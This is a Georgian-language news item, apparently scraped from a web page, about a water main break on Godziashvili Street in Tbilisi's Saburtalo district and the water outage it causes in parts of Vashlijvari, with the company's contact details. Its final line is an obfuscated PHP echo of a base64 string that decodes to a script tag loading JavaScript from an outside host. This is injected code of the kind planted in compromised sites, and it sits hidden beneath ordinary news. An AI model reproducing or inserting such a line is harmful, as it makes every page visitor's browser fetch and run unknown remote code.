celsiusi
ავერსი საქკაბელი

 დღეს, 24 მარტს, საბურთალოს რაიონში, გოძიაშვილის ქუჩა N31-ის მიმდებარედ,  ჯორჯიან უოთერ  ენდ ფაუერის წყალსადენის მაგისტრალური ქსელი ავარიულად დაზიანდა.

კომპანიის ტექნიკური ჯგუფი ადგილზეა მობილიზებული და წყლის დინების შესაჩერებლად დაიკეტა ჩამკეტ-მარეგულირებელი ურდულები. 

ქსელის დაზიანებულ მონაკვეთზე აღდგენითი სამუშაოები მაგისტრალური ქსელი წყლისგან დაცლისთანავე დაიწყება. 

აღნიშნულთან დაკავშირებით, დღეს, 24 მარტს,  15:30 საათიდან 25 მარტის დილის 08:00 საათამდე  წყალმომარაგება შეზღუდული ექნება:

ვაშლიჯვრის დასახლებაში:  მაჭავარიანის, სარაჯიშვილის, კვანტალიანის, გოძიაშვილის, ფარჯიანის, გელოვანის, იასამნის, ემუხვარის, თოფურიას და მაჭავარიანის ქუჩებს. ვაშლიჯვრის დასახლების  მე-2ა, მე-3 ა, მე-4 და მე-4ბ ზონებს.

ჯორჯიან უოთერ ენდ ფაუერი ბოდიშს უხდის მომხმარებლებს შექმნილი დისკომფორტისთვის. 

წყალმომარაგების შეზღუდვისა და აღდგენის შესახებ ინფორმაციას, ჯორჯიან უოთერ ენდ ფაუერი აბონენტებს წინასწარ, SMS-შეტყობინების სახით უგზავნის. დეტალური ინფორმაციის მოძიება შესაძლებელია კომპანიის ცხელი ხაზის - 2 93 11 11, ფეისბუქისა და ვებგვერდის მეშვეობითhttp://www.gwp.ge

170
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");